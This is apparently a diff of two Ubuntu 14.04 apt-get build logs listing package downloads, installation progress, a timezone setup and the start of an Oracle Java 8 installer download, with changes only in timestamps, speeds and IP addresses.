+Get:120 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ntpdate amd64 1:4.2.6.p5+dfsg-3ubuntu2.14.04.13 [57.4 kB]
+Get:121 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 resolvconf all 1.69ubuntu1.4 [55.1 kB]
+Get:122 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libasprintf0c2 amd64 0.18.3.1-1ubuntu3.1 [6466 B]
+Get:123 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libelf1 amd64 0.158-0ubuntu5.3 [38.3 kB]
+Get:124 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpam-systemd amd64 204-5ubuntu20.29 [25.5 kB]
+Get:125 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 systemd-services amd64 204-5ubuntu20.29 [197 kB]
+Get:126 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libsystemd-daemon0 amd64 204-5ubuntu20.29 [10.8 kB]
+Get:127 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libsystemd-login0 amd64 204-5ubuntu20.29 [27.8 kB]
+Get:128 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpolkit-gobject-1-0 amd64 0.105-4ubuntu3.14.04.5 [35.3 kB]
+Get:129 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libnss3-nssdb all 2:3.28.4-0ubuntu0.14.04.4 [10.6 kB]
+Get:130 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libnss3 amd64 2:3.28.4-0ubuntu0.14.04.4 [1120 kB]
+Get:131 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libx11-xcb-dev amd64 2:1.6.2-1ubuntu2.1 [9750 B]
+Get:132 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libx11-xcb1 amd64 2:1.6.2-1ubuntu2.1 [9350 B]
+Get:133 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 xdg-utils all 1.1.0~rc1-2ubuntu7.2 [53.9 kB]
+Get:134 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/universe amd64 chromium-browser amd64 65.0.3325.181-0ubuntu0.14.04.1 [51.8 MB]
+Get:135 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-9.6 amd64 9.6.12-1.pgdg14.04+1 [4314 kB]
+Get:136 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/universe amd64 chromium-codecs-ffmpeg-extra amd64 65.0.3325.181-0ubuntu0.14.04.1 [1016 kB]
+Get:137 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 imagemagick-common all 8:6.7.7.10-6ubuntu3.13 [38.4 kB]
+Get:138 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libcaca0 amd64 0.99.beta18-1ubuntu5.1 [202 kB]
+Get:139 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 curl amd64 7.35.0-1ubuntu2.20 [123 kB]
+Get:140 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libcurl3 amd64 7.35.0-1ubuntu2.20 [173 kB]
+Get:141 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgd3 amd64 2.1.0-3ubuntu0.10 [123 kB]
+Get:142 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libicu-dev amd64 52.1-3ubuntu0.8 [7615 kB]
+Get:143 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 icu-devtools amd64 52.1-3ubuntu0.8 [163 kB]
+Get:144 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libicu52 amd64 52.1-3ubuntu0.8 [6751 kB]
+Get:145 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 liblcms2-dev amd64 2.5-0ubuntu4.2 [5097 kB]
+Get:146 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 liblcms2-2 amd64 2.5-0ubuntu4.2 [131 kB]
+Get:147 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmagickwand-dev amd64 8:6.7.7.10-6ubuntu3.13 [272 kB]
+Get:148 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmagickwand5 amd64 8:6.7.7.10-6ubuntu3.13 [267 kB]
+Get:149 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmagickcore-dev amd64 8:6.7.7.10-6ubuntu3.13 [907 kB]
+Get:150 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmagickcore5-extra amd64 8:6.7.7.10-6ubuntu3.13 [58.4 kB]
+Get:151 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmagickcore5 amd64 8:6.7.7.10-6ubuntu3.13 [1480 kB]
+Get:152 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmysqlclient-dev amd64 5.5.62-0ubuntu0.14.04.1 [869 kB]
+Get:153 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 mysql-common all 5.5.62-0ubuntu0.14.04.1 [12.6 kB]
+Get:154 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmysqlclient18 amd64 5.5.62-0ubuntu0.14.04.1 [598 kB]
+Get:155 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpolkit-agent-1-0 amd64 0.105-4ubuntu3.14.04.5 [14.9 kB]
+Get:156 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpolkit-backend-1-0 amd64 0.105-4ubuntu3.14.04.5 [35.2 kB]
+Get:157 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python2.7-dev amd64 2.7.6-8ubuntu0.5 [269 kB]
+Get:158 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython2.7-dev amd64 2.7.6-8ubuntu0.5 [22.0 MB]
+Get:159 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython2.7 amd64 2.7.6-8ubuntu0.5 [1041 kB]
+Get:160 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python2.7 amd64 2.7.6-8ubuntu0.5 [197 kB]
+Get:161 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython2.7-stdlib amd64 2.7.6-8ubuntu0.5 [1872 kB]
+Get:162 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python2.7-minimal amd64 2.7.6-8ubuntu0.5 [1186 kB]
+Get:163 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython2.7-minimal amd64 2.7.6-8ubuntu0.5 [308 kB]
+Get:164 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libspice-server1 amd64 0.12.4-0nocelt2ubuntu1.8 [322 kB]
+Get:165 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libvorbisfile3 amd64 1.3.2-1.3ubuntu1.2 [15.8 kB]
+Get:166 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libvorbisenc2 amd64 1.3.2-1.3ubuntu1.2 [84.6 kB]
+Get:167 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libvorbis0a amd64 1.3.2-1.3ubuntu1.2 [87.2 kB]
+Get:168 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libwayland-client0 amd64 1.4.0-1ubuntu1.1 [22.1 kB]
+Get:169 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libwayland-cursor0 amd64 1.4.0-1ubuntu1.1 [9936 B]
+Get:170 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libwayland-server0 amd64 1.4.0-1ubuntu1.1 [26.9 kB]
+Get:171 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libxkbcommon0 amd64 0.4.1-0ubuntu1.1 [88.3 kB]
+Get:172 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ntp amd64 1:4.2.6.p5+dfsg-3ubuntu2.14.04.13 [422 kB]
+Get:173 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 openjdk-7-jdk amd64 7u181-2.6.14-0ubuntu0.3 [16.0 MB]
+Get:174 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 tzdata-java all 2018i-0ubuntu0.14.04 [69.5 kB]
+Get:175 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 tzdata all 2018i-0ubuntu0.14.04 [168 kB]
+Get:176 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 openjdk-7-jre amd64 7u181-2.6.14-0ubuntu0.3 [172 kB]
+Get:177 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 openjdk-7-jre-headless amd64 7u181-2.6.14-0ubuntu0.3 [39.5 MB]
+Get:178 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libsystemd-journal0 amd64 204-5ubuntu20.29 [50.6 kB]
+Get:179 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 multiarch-support amd64 2.19-0ubuntu6.14 [4482 B]
+Get:180 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 sensible-utils all 0.0.9ubuntu0.14.04.1 [10.0 kB]
+Get:181 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gpgv amd64 1.4.16-1ubuntu2.6 [161 kB]
+Get:182 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gnupg amd64 1.4.16-1ubuntu2.6 [611 kB]
+Get:183 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gnupg-agent amd64 2.0.22-3ubuntu1.4 [231 kB]
+Get:184 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gnupg2 amd64 2.0.22-3ubuntu1.4 [680 kB]
+Get:185 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 iproute2 amd64 3.12.0-2ubuntu1.2 [401 kB]
+Get:186 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ifupdown amd64 0.7.47.2ubuntu4.5 [53.3 kB]
+Get:187 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 isc-dhcp-client amd64 4.2.4-7ubuntu12.13 [640 kB]
+Get:188 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 isc-dhcp-common amd64 4.2.4-7ubuntu12.13 [709 kB]
+Get:189 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libapparmor1 amd64 2.10.95-0ubuntu2.6~14.04.4 [31.2 kB]
+Get:190 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libapparmor-perl amd64 2.10.95-0ubuntu2.6~14.04.4 [31.2 kB]
+Get:191 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 apparmor amd64 2.10.95-0ubuntu2.6~14.04.4 [362 kB]
+Get:192 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 dnsutils amd64 1:9.9.5.dfsg-3ubuntu0.18 [97.0 kB]
+Get:193 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 bind9-host amd64 1:9.9.5.dfsg-3ubuntu0.18 [46.5 kB]
+Get:194 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libisc95 amd64 1:9.9.5.dfsg-3ubuntu0.18 [148 kB]
+Get:195 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libdns100 amd64 1:9.9.5.dfsg-3ubuntu0.18 [645 kB]
+Get:196 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libisccc90 amd64 1:9.9.5.dfsg-3ubuntu0.18 [15.7 kB]
+Get:197 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libisccfg90 amd64 1:9.9.5.dfsg-3ubuntu0.18 [35.9 kB]
+Get:198 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 liblwres90 amd64 1:9.9.5.dfsg-3ubuntu0.18 [33.1 kB]
+Get:199 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libbind9-90 amd64 1:9.9.5.dfsg-3ubuntu0.18 [22.1 kB]
+Get:200 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 openssl amd64 1.0.1f-1ubuntu2.27 [489 kB]
+Get:201 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ca-certificates all 20170717~14.04.2 [166 kB]
+Get:202 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gettext-base amd64 0.18.3.1-1ubuntu3.1 [48.6 kB]
+Get:203 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 krb5-locales all 1.12+dfsg-2ubuntu5.4 [14.0 kB]
+Get:204 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 openssh-sftp-server amd64 1:6.6p1-2ubuntu2.12 [34.2 kB]
+Get:205 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 openssh-server amd64 1:6.6p1-2ubuntu2.12 [319 kB]
+Get:206 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 openssh-client amd64 1:6.6p1-2ubuntu2.12 [566 kB]
+Get:207 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 plymouth-theme-ubuntu-text amd64 0.8.8-0ubuntu17.2 [7958 B]
+Get:208 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-apt-common all 0.9.3.5ubuntu3 [15.0 kB]
+Get:209 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3-apt amd64 0.9.3.5ubuntu3 [139 kB]
+Get:210 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ubuntu-release-upgrader-core all 1:0.220.10 [24.2 kB]
+Get:211 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3-distupgrade all 1:0.220.10 [104 kB]
+Get:212 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3-update-manager all 1:0.196.25 [32.2 kB]
+Get:213 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 update-manager-core all 1:0.196.25 [8280 B]
+Get:214 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 rsync amd64 3.1.0-2ubuntu0.4 [284 kB]
+Get:215 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 wget amd64 1.15-1ubuntu1.14.04.4 [270 kB]
+Get:216 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ant-optional all 1.9.3-2ubuntu0.1 [301 kB]
+Get:217 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ant all 1.9.3-2ubuntu0.1 [1868 kB]
+Get:218 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 grub-pc amd64 2.02~beta2-9ubuntu1.16 [174 kB]
+Get:219 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 grub-pc-bin amd64 2.02~beta2-9ubuntu1.16 [882 kB]
+Get:220 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 grub2-common amd64 2.02~beta2-9ubuntu1.16 [501 kB]
+Get:221 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 grub-common amd64 2.02~beta2-9ubuntu1.16 [1684 kB]
+Get:222 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3-problem-report all 2.14.1-0ubuntu3.29 [9504 B]
+Get:223 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3-apport all 2.14.1-0ubuntu3.29 [75.5 kB]
+Get:224 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 apport all 2.14.1-0ubuntu3.29 [183 kB]
+Get:225 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 btrfs-tools amd64 3.12-1ubuntu0.2 [332 kB]
+Get:226 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 dpkg-dev all 1.17.5ubuntu5.8 [726 kB]
+Get:227 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libdpkg-perl all 1.17.5ubuntu5.8 [179 kB]
+Get:228 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 patch amd64 2.7.1-4ubuntu2.4 [86.9 kB]
+Get:229 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-percept amd64 1:16.b.3-dfsg-1ubuntu2.2 [136 kB]
+Get:230 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-diameter amd64 1:16.b.3-dfsg-1ubuntu2.2 [600 kB]
+Get:231 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-os-mon amd64 1:16.b.3-dfsg-1ubuntu2.2 [94.9 kB]
+Get:232 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-snmp amd64 1:16.b.3-dfsg-1ubuntu2.2 [1496 kB]
+Get:233 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-tools amd64 1:16.b.3-dfsg-1ubuntu2.2 [503 kB]
+Get:234 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-webtool amd64 1:16.b.3-dfsg-1ubuntu2.2 [39.5 kB]
+Get:235 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-erl-docgen amd64 1:16.b.3-dfsg-1ubuntu2.2 [134 kB]
+Get:236 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-edoc amd64 1:16.b.3-dfsg-1ubuntu2.2 [299 kB]
+Get:237 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-corba amd64 1:16.b.3-dfsg-1ubuntu2.2 [2236 kB]
+Get:238 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-inets amd64 1:16.b.3-dfsg-1ubuntu2.2 [755 kB]
+Get:239 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-runtime-tools amd64 1:16.b.3-dfsg-1ubuntu2.2 [157 kB]
+Get:240 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-xmerl amd64 1:16.b.3-dfsg-1ubuntu2.2 [973 kB]
+Get:241 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-syntax-tools amd64 1:16.b.3-dfsg-1ubuntu2.2 [289 kB]
+Get:242 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-mnesia amd64 1:16.b.3-dfsg-1ubuntu2.2 [658 kB]
+Get:243 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-ssh amd64 1:16.b.3-dfsg-1ubuntu2.2 [361 kB]
+Get:244 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-eldap amd64 1:16.b.3-dfsg-1ubuntu2.2 [91.7 kB]
+Get:245 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-ssl amd64 1:16.b.3-dfsg-1ubuntu2.2 [559 kB]
+Get:246 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-public-key amd64 1:16.b.3-dfsg-1ubuntu2.2 [497 kB]
+Get:247 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-crypto amd64 1:16.b.3-dfsg-1ubuntu2.2 [70.3 kB]
+Get:248 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-ic amd64 1:16.b.3-dfsg-1ubuntu2.2 [818 kB]
+Get:249 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-eunit amd64 1:16.b.3-dfsg-1ubuntu2.2 [137 kB]
+Get:250 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-parsetools amd64 1:16.b.3-dfsg-1ubuntu2.2 [156 kB]
+Get:251 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-odbc amd64 1:16.b.3-dfsg-1ubuntu2.2 [50.2 kB]
+Get:252 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-asn1 amd64 1:16.b.3-dfsg-1ubuntu2.2 [738 kB]
+Get:253 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-base amd64 1:16.b.3-dfsg-1ubuntu2.2 [6519 kB]
+Get:254 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 erlang-nox all 1:16.b.3-dfsg-1ubuntu2.2 [17.9 kB]
+Get:255 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gettext amd64 0.18.3.1-1ubuntu3.1 [829 kB]
+Get:256 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 imagemagick amd64 8:6.7.7.10-6ubuntu3.13 [189 kB]
+Get:257 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-twisted-bin amd64 13.2.0-1ubuntu1.2 [11.9 kB]
+Get:258 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-twisted-core all 13.2.0-1ubuntu1.2 [983 kB]
+Get:259 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-twisted-web all 13.2.0-1ubuntu1.2 [291 kB]
+Get:260 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-apt amd64 0.9.3.5ubuntu3 [141 kB]
+Get:261 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 landscape-client amd64 14.12-0ubuntu6.14.04.4 [18.6 kB]
+Get:262 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 landscape-common amd64 14.12-0ubuntu6.14.04.4 [170 kB]
+Get:263 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libruby1.9.1 amd64 1.9.3.484-2ubuntu1.13 [2649 kB]
+Get:264 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ruby1.9.1 amd64 1.9.3.484-2ubuntu1.13 [35.6 kB]
+Get:265 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 memcached amd64 1.4.14-0ubuntu9.3 [67.3 kB]
+Get:266 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 policykit-1 amd64 0.105-4ubuntu3.14.04.5 [51.9 kB]
+Get:267 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-six all 1.5.2-1ubuntu1.1 [8348 B]
+Get:268 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-urllib3 all 1.7.1-1ubuntu4.1 [39.4 kB]
+Get:269 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-requests all 2.2.1-1ubuntu0.4 [43.5 kB]
+Get:270 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-twisted-names all 13.2.0-1ubuntu1.2 [78.5 kB]
+Get:271 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 w3m amd64 0.5.3-15ubuntu0.2 [876 kB]
+Get:272 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 xfsprogs amd64 3.1.9ubuntu2.1 [507 kB]
+Get:273 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 cloud-init all 0.7.5-0ubuntu1.23 [200 kB]
+Get:274 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libruby2.0 amd64 2.0.0.484-1ubuntu2.11 [2805 kB]
+Get:275 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ruby2.0 amd64 2.0.0.484-1ubuntu2.11 [66.5 kB]
+Get:276 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 open-vm-tools amd64 2:9.4.0-1280544-5ubuntu6.4 [451 kB]
+Get:277 http://ppa.launchpad.net/openjdk-r/ppa/ubuntu trusty/main amd64 openjdk-8-jre amd64 8u171-b11-2~14.04 [69.0 kB]
+Get:278 http://ppa.launchpad.net/openjdk-r/ppa/ubuntu trusty/main amd64 openjdk-8-jre-headless amd64 8u171-b11-2~14.04 [26.8 MB]
 Get:279 http://ppa.launchpad.net/webupd8team/java/ubuntu trusty/main amd64 oracle-java8-installer all 8u201-1~webupd8~1 [32.5 kB]
 Get:280 http://ppa.launchpad.net/webupd8team/java/ubuntu trusty/main amd64 oracle-java8-unlimited-jce-policy all 8u201-1~webupd8~1 [9582 B]
 Get:281 http://ppa.launchpad.net/git-core/ppa/ubuntu trusty/main amd64 git amd64 1:2.20.1-0ppa1~ubuntu14.04.1 [5468 kB]
@@ -981,7 +981,7 @@ Get:284 http://ppa.launchpad.net/chris-lea/redis-server/ubuntu trusty/main amd64
 Get:285 http://ppa.launchpad.net/chris-lea/redis-server/ubuntu trusty/main amd64 redis-tools amd64 5:5.0.3-3chl1~trusty1 [772 kB]
 
Extracting templates from packages: 10%
Extracting templates from packages: 21%
Extracting templates from packages: 31%
Extracting templates from packages: 42%
Extracting templates from packages: 52%
Extracting templates from packages: 63%
Extracting templates from packages: 73%
Extracting templates from packages: 84%
Extracting templates from packages: 94%
Extracting templates from packages: 100%
 Preconfiguring packages ...
-Fetched 430 MB in 34s (12.3 MB/s)
+Fetched 430 MB in 1min 39s (4310 kB/s)
 (Reading database ... 
(Reading database ... 5%
(Reading database ... 10%
(Reading database ... 15%
(Reading database ... 20%
(Reading database ... 25%
(Reading database ... 30%
(Reading database ... 35%
(Reading database ... 40%
(Reading database ... 45%
(Reading database ... 50%
(Reading database ... 55%
(Reading database ... 60%
(Reading database ... 65%
(Reading database ... 70%
(Reading database ... 75%
(Reading database ... 80%
(Reading database ... 85%
(Reading database ... 90%
(Reading database ... 95%
(Reading database ... 100%
(Reading database ... 93695 files and directories currently installed.)
 Preparing to unpack .../dpkg_1.17.5ubuntu5.8_amd64.deb ...
 Unpacking dpkg (1.17.5ubuntu5.8) over (1.17.5ubuntu5.7) ...
@@ -1417,8 +1417,8 @@ Processing triggers for hicolor-icon-theme (0.13-1) ...
 Setting up tzdata (2018i-0ubuntu0.14.04) ...
 
 Current default time zone: 'Etc/UTC'
-Local time is now:      Sun Feb 17 04:40:08 UTC 2019.
-Universal Time is now:  Sun Feb 17 04:40:08 UTC 2019.
+Local time is now:      Sun Feb 17 10:47:16 UTC 2019.
+Universal Time is now:  Sun Feb 17 10:47:16 UTC 2019.
 Run 'dpkg-reconfigure tzdata' if you wish to change it.
 
 (Reading database ... 
(Reading database ... 5%
(Reading database ... 10%
(Reading database ... 15%
(Reading database ... 20%
(Reading database ... 25%
(Reading database ... 30%
(Reading database ... 35%
(Reading database ... 40%
(Reading database ... 45%
(Reading database ... 50%
(Reading database ... 55%
(Reading database ... 60%
(Reading database ... 65%
(Reading database ... 70%
(Reading database ... 75%
(Reading database ... 80%
(Reading database ... 85%
(Reading database ... 90%
(Reading database ... 95%
(Reading database ... 100%
(Reading database ... 93662 files and directories currently installed.)
@@ -1437,89 +1437,89 @@ No /var/cache/oracle-jdk8-installer/wgetrc file found.
 Creating /var/cache/oracle-jdk8-installer/wgetrc and
 using default oracle-java8-installer wgetrc settings for it.
 Downloading Oracle Java 8...
---2019-02-17 04:40:14--  http://download.oracle.com/otn-pub/java/jdk/8u201-b09/42970487e3af4f5aa5bca3f542482c60/jdk-8u201-linux-x64.tar.gz
-Resolving download.oracle.com (download.oracle.com)... 184.26.42.134
-Connecting to download.oracle.com (download.oracle.com)|184.26.42.134|:80... connected.
+--2019-02-17 10:47:23--  http://download.oracle.com/otn-pub/java/jdk/8u201-b09/42970487e3af4f5aa5bca3f542482c60/jdk-8u201-linux-x64.tar.gz
+Resolving download.oracle.com (download.oracle.com)... 172.226.97.6
+Connecting to download.oracle.com (download.oracle.com)|172.226.97.6|:80... connected.
 HTTP request sent, awaiting response... 302 Moved Temporarily
